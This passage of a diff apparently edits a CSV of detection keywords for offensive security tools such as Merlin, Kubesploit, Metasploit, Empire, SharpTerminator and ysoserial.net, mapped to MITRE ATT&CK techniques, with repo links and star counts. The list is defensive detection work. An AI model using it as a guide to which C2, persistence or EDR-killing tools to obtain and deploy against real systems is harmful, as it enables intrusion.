T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinAgent-*.exe*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" "*merlinAgent.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*merlinAgent-Darwin-*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" -"*merlinAgent-Linux-*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinAgent-Darwin-*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinAgent-Linux-*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" "*merlinAgent-Windows-x64.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*MerlinCheatSheet.pdf*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*merlinServer-*.7z*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" -"*merlinServer-*.exe*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinServer-*.7z*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinServer-*.exe*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" "*merlinserver.go*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinserver_windows_x64.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*merlinServer-Linux*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinServer-Linux*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" "*merlinServerLog.txt*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*mertdas/RedPersist*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*mertdas/RedPersist*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" "*mertdas/SharpLDAP*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" "*mertdas/SharpTerminator*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" -"*MessageBox.Show*Pwned*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*MessageBox.Show*Pwned*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*messagebox_reflective.dll*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" -"*met_inject.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*met_inject.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*metagoofil*","offensive_tool_keyword","metagoofil","Metagoofil is a tool for extracting metadata of public documents (pdf.doc.xls.ppt..etc) availables in the target websites.This information could be useful because you can get valid usernames. people names. for using later in bruteforce password attacks (vpn. ftp. webapps). the tool will also extracts interesting paths of the documents. where we can get shared resources names. server names... etc.","T1213 - T1596 - T1083 - T1082","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/metagoofi","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*metame -i *.exe*","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","6","508","96","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" -"*Metasploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Metasploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*metasploit.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*metasploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*metasploit/framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*metasploit/peass.rb*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*metasploit_framework.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*metasploit-framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*metasploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*metasploit/framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*metasploit/peass.rb*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*metasploit_framework.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*metasploit-framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*metasploit-framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*metasploitframework*.msi*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*MetasploitPayload.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1149","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*metasploitframework*.msi*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*MetasploitPayload.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1149","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*metatwin.ps1*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*metatwin-master*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" -"*meterpreter*.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*meterpreter*.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 